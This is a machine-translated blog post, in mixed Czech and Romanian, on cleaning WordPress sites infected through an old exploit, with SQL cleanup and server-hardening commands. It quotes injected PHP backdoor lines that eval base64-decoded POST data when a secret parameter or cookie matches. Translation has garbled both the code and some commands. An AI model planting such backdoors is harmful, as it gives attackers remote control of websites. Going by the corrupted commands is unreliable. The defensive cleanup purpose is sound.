Než si přečtete tento příspěvek, musíte vidět Příspěvek zde, něco pochopit. :)
Našel jsem v několika souborech blogů na StealthSetts.com, kódech podobných těm níže, které se objevily v důsledku viru s Exploitul de WordPress.:
<? Php if ($ _ get [‘573abcb060974771 '] ==”8E96D1B4B674E1D2″) {eftation (base64_decode ($ _ post [‘file '])); výstup; }?>
a
<? Php if ($ _ cookie ['44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eftation (base64_decode ($ _ post [‘file '])); výstup; }?>
Ve výše uvedeném případě jde o soubor xmlrpc.php z Ospalý, ale na a Grep Na serveru můžete vidět, že ve zdrojích je poměrně mnoho kódů svého druhu.
Čištění infikovaných souborů:
OOOOKKKKKYOUAK
1. Nejlepší řešení po dokončení zálohování-ul si curatata baza de date, este sa VYMAZAT fisierele de WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.
Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.
./andreea/wp-content/themes/default/index.php:<? Php if ($ _ cookie ['44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eftation (base64_decode ($ _ post [‘file '])); výstup; }?><?php get_header(); ?>
2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.
find . -name “*_New.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “* _giff”
find . -name “*_pnggg”
find . -name “wp-info.txt”
3. in /tmp , hledat a smazat složky jako TMPYWBZT2
Čištění SQL :
1. V tabulce tabulky wp_options Zjistěte, zda existují a smažte řádky: interní_links_cache, Ris_F541B3ABD05E7962FCAB37737F40FAD8 a wordpress_options.
2.. Také v wp_options přejděte na aktivní_plugins A smažte, pokud existuje, plugin, který končí jedním z rozšíření *_new.php, *_old.php, *.jpgg, *.giff, *.pnggg nebo pokud existuje další podezřelé rozšíření, opatrně zkontrolujte.
3. v tabulce wp_users, zjistěte, zda existuje uživatel, který nemá co psát vedle něj, ve sloupci user_nicename. Odstraňte tohoto uživatele, ale ponechte si číslo ve sloupci ID. Tento uživatel je možné použít „WordPress“ jako user_Login A zdá se, že je vytvořen na 00:00 0000-00-00.
4. Jděte ke stolu WP_USERMETA a odstranit všechny řádky, které patří do výše uvedeného ID.
Poté, co jste provedli toto čištění SQL, deaktivujte a poté aktivujte nějaký plugin. (v blogu -> Dashboard -> Pluginy)
Sekurizace serveru:
1. Podívejte se, které adresáře a soubory jsou “zapisovatelný„(Chmod 777) a pokuste se na ně dát Chmod což jim již neumožňuje psát z jakékoli úrovně. (Například chmod 644)
najít. -Perm -2 –LS
2. Podívejte se, jaké soubory nastavily bit jižní nebo brusle . Pokud tyto soubory na ně nepoužíváte chmod 0 nebo odinstalovat balíček, který obsahuje. Jsou velmi nebezpeční, protože vystupují s privilegiami “skupina"Nebo"vykořenit„A ne s oprávněními normálního uživatele, který tento soubor provádí.
find / -type f -perm -04000 -ls
find / -type f -perm -02000 -ls
3. Verificati ce porturi sunt deschise si incercati sa inchideti sau sa securizati pe cele care nu sunt folosite.
netstat -an | grep -i listen
Cam atat. Vad ca unele bloguri sunt banate de Google Search si altii spun “Bine le-a facut!!!” . Pai bine le-o fi facut…dar ce spuneti daca incepe google sa baneze toate site-urile kdo to dělá SE SPAM si baga troieni (Trojan.Clicker.HTML) in cookies?
1 pomyslel na „Využití WordPress – Čištění virových souborů, zabezpečení SQL a serveru.”